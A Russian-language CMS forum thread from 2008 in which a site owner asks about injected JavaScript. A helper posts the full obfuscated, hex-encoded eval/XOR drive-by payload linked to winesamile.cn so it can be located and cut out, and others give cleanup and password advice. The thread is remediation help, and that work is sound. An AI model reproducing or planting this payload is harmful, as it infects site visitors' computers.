Атака на сайт

 
Sometime CMS Community
Посетитель
no avatar
Сообщений: 36
На мой сайт внедрилась какая то хрень...........window['eAvLaklq'.replace(/[qL1Ak]/g, '')](window['eAvLaklq'.replace(/[qL1Ak]/g, '')]('uzndezsTc,azpdez'.replace(/[,zd;T]/g, ''))(' Здесь зашиврованный код...я его урезал код32%38%25%32%37%25%33%31%25%32%637%35%2525%34%62%27%29%3b'));script>
Редактировалось: 2 раз (Последний: 30 декабря 2008 в 06:10)
Sometime CMS Community
Посетитель
no avatar
Медаль
Сообщений: 235
22zona:
<br/>На мой сайт внедрилась какая то хрень...........window['eAvLaklq'.replace(/[qL1Ak]/g, '')](window['eAvLaklq'.replace(/[qL1Ak]/g, '')]('uzndezsTc,azpdez'.replace(/[,zd;T]/g, ''))(' Здесь зашиврованный код...я его урезал код32%38%25%32%37%25%33%31%25%32%637%35%2525%34%62%27%29%3b'));script><br/>
<br/>Внимание! Посещение этого сайта может нанести вред вашему компьютеру.<br/>Веб-сайт по адресу www.22zona.ru содержит элементы сайта winesamile.cn, где, вероятно, размещено вредоносное ПО – программа, которая может нанести вред вашему компьютеру или выполять действия без вашего согласия. Ваш компьютер может быть заражен просто при посещении сайта, на котором размещена вредоносная программа.<br/>Более подробную информацию о неполадках с этими элементами можно найти на странице Google Страница диагностики безопасного просмотра для домена winesamile.cn.<br/>это вирус<br/>открывай все фаилы и вырезай код!!!
Реклама
cms
Sometime CMS Community
Посетитель
no avatar
Медаль
Сообщений: 235
вот это вырезай<br/>window['eAvLaklq'.replace(/[qL1Ak]/g, '')](window['eAvLaklq'.replace(/[qL1Ak]/g, '')]('uzndezsTc,azpdez'.replace(/[,zd;T]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%48%49%61%47%28%41%41%50%61%4c%29%7b%66%75%6e%63%74%69%6f%6e%20%41%4c%54%28%41%44%61%50%49%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%49%4c%41%49%49%3d%30%3b%22%29%3b%76%61%72%20%50%61%50%3d%41%44%61%50%49%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%41%61%61%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%41%61%61%3c%50%61%50%29%7b%41%49%4c%41%49%49%2b%3d%48%70%49%47%28%41%44%61%50%49%49%2c%50%41%61%61%29%2a%50%61%50%3b%50%41%61%61%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%41%49%4c%41%49%49%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%48%70%49%47%28%48%70%47%6c%47%2c%48%70%49%61%29%7b%72%65%74%75%72%6e%20%48%70%47%6c%47%2e%63%68%61%72%43%6f%64%65%41%74%28%48%70%49%61%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%41%4c%61%50%4c%3d%65%76%61%6c%28%27%61%7c%72%29%67%3e%75%40%6d%26%65%29%6e%26%74%26%73%26%2e%29%63%7c%61%29%6c%26%6c%3e%65%3e%65%26%27%2e%72%65%70%6c%61%63%65%28%2f%5b%26%5c%3e%40%5c%29%5c%7c%5d%2f%67%2c%20%27%27%29%29%2c%50%68%48%54%3d%27%27%3b%76%61%72%20%41%44%54%41%44%3d%30%2c%4c%41%61%48%68%3d%30%2c%48%49%41%41%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%41%4c%61%50%4c%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%50%6c%41%41%50%3d%41%4c%54%28%48%49%41%41%29%3b%65%76%61%6c%28%22%41%41%50%61%4c%3d%75%6e%65%73%63%61%70%65%28%41%41%50%61%4c%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%44%41%54%54%41%54%61%3d%30%3b%20%41%44%41%54%54%41%54%61%20%3c%20%28%41%41%50%61%4c%2e%6c%65%6e%67%74%68%29%3b%20%41%44%41%54%54%41%54%61%2b%2b%29%7b%76%61%72%20%4c%61%41%49%54%3d%48%70%49%47%28%48%49%41%41%2c%41%44%54%41%44%29%5e%48%70%49%47%28%50%6c%41%41%50%2c%4c%41%61%48%68%29%3b%76%61%72%20%41%4c%4c%50%3d%48%70%49%47%28%41%41%50%61%4c%2c%41%44%41%54%54%41%54%61%29%3b%41%44%54%41%44%2b%2b%3b%4c%41%61%48%68%2b%2b%3b%69%66%28%4c%41%61%48%68%3e%50%6c%41%41%50%2e%6c%65%6e%67%74%68%29%4c%41%61%48%68%3d%30%3b%69%66%28%41%44%54%41%44%3e%48%49%41%41%2e%6c%65%6e%67%74%68%29%41%44%54%41%44%3d%30%3b%50%68%48%54%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%41%4c%4c%50%5e%4c%61%41%49%54%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%50%68%48%54%29%3b%20%72%65%74%75%72%6e%20%50%68%48%54%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%48%49%61%47%28%27%25%33%32%25%33%36%25%33%31%25%33%36%25%33%31%25%33%39%25%33%31%25%33%36%25%36%38%25%33%37%25%33%66%25%33%37%25%33%30%25%32%30%25%34%31%25%33%39%25%35%33%25%34%36%25%33%63%25%32%63%25%32%30%25%33%62%25%37%38%25%32%64%25%32%39%25%31%36%25%33%65%25%34%36%25%31%38%25%34%38%25%33%33%25%30%65%25%31%33%25%30%64%25%33%65%25%31%33%25%33%64%25%32%65%25%36%39%25%33%34%25%33%31%25%31%64%25%31%39%25%30%65%25%32%34%25%33%65%25%31%33%25%36%34%25%32%64%25%33%35%25%32%35%25%31%35%25%37%66%25%37%37%25%31%61%25%31%34%25%32%32%25%30%37%25%31%35%25%31%35%25%33%38%25%37%33%25%35%65%25%37%63%25%33%65%25%36%62%25%32%64%25%32%36%25%32%63%25%36%64%25%37%64%25%31%65%25%32%37%25%33%30%25%31%31%25%34%64%25%37%66%25%37%37%25%37%36%25%32%38%25%30%36%25%33%65%25%32%39%25%33%35%25%30%62%25%31%39%25%33%34%25%33%35%25%34%38%25%30%32%25%30%63%25%35%38%25%30%63%25%31%66%25%31%64%25%30%30%25%31%34%25%31%66%25%30%34%25%31%65%25%35%66%25%31%38%25%30%36%25%33%64%25%30%35%25%35%66%25%34%34%25%30%63%25%30%64%25%35%39%25%32%33%25%33%32%25%31%35%25%31%39%25%31%35%25%31%32%25%33%33%25%33%61%25%33%35%25%33%36%25%32%37%25%32%30%25%36%34%25%36%34%25%32%66%25%32%38%25%31%66%25%30%65%25%31%38%25%35%38%25%35%34%25%37%66%25%37%34%25%37%31%25%35%38%25%36%36%25%33%30%25%37%30%25%32%62%25%31%63%25%33%64%25%33%39%25%30%35%25%33%63%25%33%30%25%31%38%25%33%66%25%30%34%25%36%39%25%31%34%25%36%39%25%35%38%25%30%37%25%33%32%25%33%32%25%32%38%25%32%36%25%32%31%25%33%38%25%30%62%25%32%32%25%32%32%25%32%63%25%35%36%25%33%33%25%37%35%25%36%39%25%37%31%25%37%38%25%35%35%25%30%30%25%37%38%25%32%30%25%31%35%25%33%36%25%33%38%25%33%64%25%30%63%25%32%35%25%31%64%25%32%32%25%33%61%25%33%33%25%33%32%25%36%62%25%35%66%25%31%35%25%33%32%25%33%39%25%31%39%25%33%62%25%33%33%25%37%30%25%37%31%25%37%38%25%37%33%25%37%38%25%34%65%25%35%32%25%33%66%25%33%62%25%33%62%25%33%30%25%32%37%25%37%61%25%33%62%25%31%35%25%37%30%25%33%38%25%33%62%25%33%37%25%36%36%25%36%35%25%33%35%25%33%36%25%31%63%25%33%36%25%33%62%25%33%30%25%33%35%25%33%65%25%37%63%25%37%31%25%30%32%25%34%30%25%31%35%25%34%62%25%37%63%25%37%37%25%33%65%25%31%62%25%31%34%25%31%36%25%32%32%25%31%65%25%32%65%25%37%38%25%35%33%25%30%62%25%32%62%25%31%63%25%32%61%25%36%34%25%37%37%25%31%33%25%31%64%25%31%38%25%30%35%25%32%33%25%37%63%25%32%37%25%32%36%25%32%38%25%32%37%25%32%63%25%33%31%25%33%39%25%31%36%25%35%64%25%37%66%25%37%39%25%30%35%25%35%34%25%32%62%25%31%32%25%30%36%25%30%35%25%37%38%25%37%65%25%34%65%25%31%62%25%37%65%25%32%37%25%33%31%25%32%64%25%33%34%25%33%61%25%34%37%25%31%64%25%34%31%25%35%32%25%36%32%25%36%37%25%33%63%25%31%32%25%37%35%25%30%31%25%32%36%25%31%30%25%34%65%25%36%64%25%35%65%25%34%62%27%29%3b'));><br/>
Sometime CMS Community
Посетитель
no avatar
Сообщений: 36
Каким образом он мог попасть на мой сайт? Я уже заменял файлы, только он опять через некоторое время там появляется...........
Посетитель
small user social cms
Медаль
Сообщений: 256
22zona,<br/>1. Проверьте свой компьютер антивирусными программами (для экспресс-проверки без установки можно использовать бесплатную лечащую утилиту Dr. Web CureIt! — скачайте, запуститесь в безопасном режиме и запустите проверку; также можно использовать LiveCD «Лаборатории Касперского» или Dr. Web — скачать образ, записать его на болванку и загрузиться с нее). Обычно пароли воруются троянскими программами именно с локальных машин! Старайтесь не сохранять пароли в ftp-клиенте.<br/> <br/>2. Найдите и удалите у себя на хостинге подозрительные php-файлы (обычно имя такого файла состоит из случайного набора символов) — так называемые php-шеллы, часто зашифрованные, которые используются для несанкционированной модификации Ваших сайтов.<br/> <br/>3. Поменяйте пароли к панели управления Вашим хостингом, также посмотрите наличие посторонних ftp-аккаунтов и удалите таковые, если имеются, затем поменяйте пароли к ftp-аккаунтам, созданным Вами. Не используйте простые пароли!<br/> <br/>4. Установите и настройте файрволл, заблокируйте любые исходящие соединения для всех приложений кроме тех, которым Вы доверяете.
Редактировалось: 1 раз (Последний: 30 декабря 2008 в 09:17)
Не ищите простых решений!
Sometime CMS Community
Посетитель
no avatar
Медаль
Сообщений: 185
Меняйте пароли, логины к ftp-доступу, mysql. Удалите iframe на заражённый сайт со страниц и всё что находится после . Проверяйте БД.
Посетитель
small user social cms
Медаль
Сообщений: 256
22zona,<br/> <br/>посмотрел код главной страницы Вашего сайта. Гадость пишется в самый конец, удалять надо, начиная с < ! -- ad -- > и до конца.<br/> <br/>Но предложенные мною и Nataliy меры ни в коем случае не игнорируйте, иначе скоро увидите все это снова...
Редактировалось: 3 раз (Последний: 30 декабря 2008 в 09:43)
Не ищите простых решений!
Sometime CMS Community
Посетитель
no avatar
Сообщений: 11
Скорее всего у вас в конце html файла строчка на javascripts - это троян на вашем компьютере.
Sometime CMS Community
Посетитель
no avatar
Сообщений: 11
раз уж заговорили о "атаках")) никто исчо не пользовался убийцой фреймов? на летитбите гуд работает)))
Посетитель
small user social cms
Медаль
Сообщений: 136
Артём, а можно поподробнее?
Divaxo.ru - блог про интернет технологии
Sometime CMS Community
Посетитель
no avatar
Сообщений: 11
ты про что7 про "атаку на сайт"))) или про фреймы?
Посетитель
small user social cms
Медаль
Сообщений: 256
Нужно почистить комп и сменить все данные для доступа к ftp. Вирус выдирает данные из сохраненных данных на компе и обращается к серверу, прописывая свои данные во все файлы под именами index. Даже если удалить вирус из компа, данные сохраняются на удаленном сервере и каждый день вирус перепрописывает в файлах нужную ему информацию, в виде фреймов, скриптов, ссылок и так далее. Поэтому смена данных для хостинга как и чистка компа обязательна. И желательно взять себе как правило не хранить сохраненные данные, лучше вводить их каждый раз заново, а если сохранять то иметь привычку менять данные хотя бы раз в 3 месяца.
Посетитель
small user social cms
Медаль
Сообщений: 176
То, что вы описываете характерно для действия "руткитов" - вирей, которые очень хорошо интегрируются с ядром винды. Как правило, они лезут через дыры в IE, на XP, причем не на лицензионках.Крадут фтп пароли и модифицируют сайты, да index файлы. Зашедший на сайт клиент с дырявым ПО как правило тоже стает жертвой. Идеально поможет лишь переустановка операционки. И нужно сменить все пароли и почистить index файлы во всех каталогах сайта.<br/>Чтобы такого не было в будущем, достаточно поставить любой файрвол например оутпост. Или бесплатный СОММОDО.<br/>Эпидемия на подобных руткитах прошла года полтора назад, скорее всего какой то негодяй модифицировал код.
Редактировалось: 1 раз (Последний: 30 декабря 2008 в 16:57)
Посетитель
small user social cms
Медаль
Сообщений: 256
все верно
Посетитель
small user social cms
Медаль
Сообщений: 256
Alex:
<br/>Как правило, они лезут через дыры в IE, на XP, причем не на лицензионках.<br/>
<br/>Вот уж на лицензионность системы они точно не обращают никакого внимания.<br/>
Не ищите простых решений!
В начало страницы
Предыдущая темаСледующая тема Перейти на форум:
Быстрый ответ
Чтобы писать на форуме, зарегистрируйтесь или авторизуйтесь.